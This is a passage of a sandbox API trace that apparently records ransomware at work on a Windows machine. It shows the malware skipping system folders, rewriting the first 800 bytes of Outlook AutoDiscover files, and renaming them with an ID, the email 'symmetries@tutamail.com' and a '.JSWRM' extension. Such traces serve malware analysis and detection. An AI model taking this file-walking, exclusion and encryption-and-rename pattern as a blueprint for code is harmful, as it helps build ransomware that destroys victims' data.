(lpString1="SWBELL.NET.XML", lpString2="windows") returned -1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="recovery") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="perflogs") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="documents and settings") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="system volume information") returned -1 [0137.886] lstrcmpiW (lpString1="SWBELL.NET.XML", lpString2="msocache") returned 1 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SWBELL.NET.XML", lpUsedDefaultChar=0x0) returned 14 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SWBELL.NET.XML", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SWBELL.NET.XML", lpUsedDefaultChar=0x0) returned 14 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SWBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\swbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.887] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.887] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.887] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.888] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.889] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.889] CloseHandle (hObject=0x238) returned 1 [0137.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SWBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\swbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\SWBELL.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\swbell.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.890] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c943977, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c943977, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="TALK21.COM.XML", cAlternateFileName="TALK21~1.XML")) returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2=".") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="..") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="...") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="windows") returned -1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="recovery") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="perflogs") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="documents and settings") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="system volume information") returned 1 [0137.890] lstrcmpiW (lpString1="TALK21.COM.XML", lpString2="msocache") returned 1 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TALK21.COM.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TALK21.COM.XML", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TALK21.COM.XML", lpUsedDefaultChar=0x0) returned 14 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TALK21.COM.XML", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TALK21.COM.XML", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TALK21.COM.XML", lpUsedDefaultChar=0x0) returned 14 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\TALK21.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\talk21.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.891] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=807) returned 1 [0137.891] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.891] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.893] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.893] CloseHandle (hObject=0x238) returned 1 [0137.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\TALK21.COM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\talk21.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\TALK21.COM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\talk21.com.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.895] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WANS.NET.XML", cAlternateFileName="WANSNE~1.XML")) returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2=".") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="..") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="...") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="windows") returned -1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="recovery") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="perflogs") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="documents and settings") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="system volume information") returned 1 [0137.895] lstrcmpiW (lpString1="WANS.NET.XML", lpString2="msocache") returned 1 [0137.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WANS.NET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WANS.NET.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WANS.NET.XML", lpUsedDefaultChar=0x0) returned 12 [0137.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WANS.NET.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WANS.NET.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WANS.NET.XML", lpUsedDefaultChar=0x0) returned 12 [0137.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\WANS.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\wans.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.897] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0137.897] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.897] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.899] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.899] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.899] CloseHandle (hObject=0x238) returned 1 [0137.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\WANS.NET.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\wans.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\WANS.NET.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\wans.net.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.901] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CA.XML", cAlternateFileName="YA4C16~1.XML")) returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2=".") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="..") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="...") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="windows") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="recovery") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="perflogs") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="documents and settings") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="system volume information") returned 1 [0137.901] lstrcmpiW (lpString1="YAHOO.CA.XML", lpString2="msocache") returned 1 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CA.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CA.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CA.XML", lpUsedDefaultChar=0x0) returned 12 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CA.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CA.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CA.XML", lpUsedDefaultChar=0x0) returned 12 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CA.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.904] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=804) returned 1 [0137.905] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.905] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.906] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.906] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.906] CloseHandle (hObject=0x238) returned 1 [0137.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CA.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ca.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CA.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.ca.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.908] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.ID.XML", cAlternateFileName="YA6C44~1.XML")) returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2=".") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="..") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="...") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="windows") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="recovery") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="perflogs") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="documents and settings") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="system volume information") returned 1 [0137.908] lstrcmpiW (lpString1="YAHOO.CO.ID.XML", lpString2="msocache") returned 1 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.ID.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.ID.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.ID.XML", lpUsedDefaultChar=0x0) returned 15 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.ID.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.ID.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.ID.XML", lpUsedDefaultChar=0x0) returned 15 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.ID.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.id.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.909] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.909] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.911] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.911] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.911] CloseHandle (hObject=0x238) returned 1 [0137.911] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.ID.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.id.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.ID.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.id.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.912] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.IN.XML", cAlternateFileName="YA8E91~1.XML")) returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2=".") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="..") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="...") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="windows") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="recovery") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="perflogs") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="documents and settings") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="system volume information") returned 1 [0137.912] lstrcmpiW (lpString1="YAHOO.CO.IN.XML", lpString2="msocache") returned 1 [0137.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.IN.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.IN.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.IN.XML", lpUsedDefaultChar=0x0) returned 15 [0137.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.IN.XML", 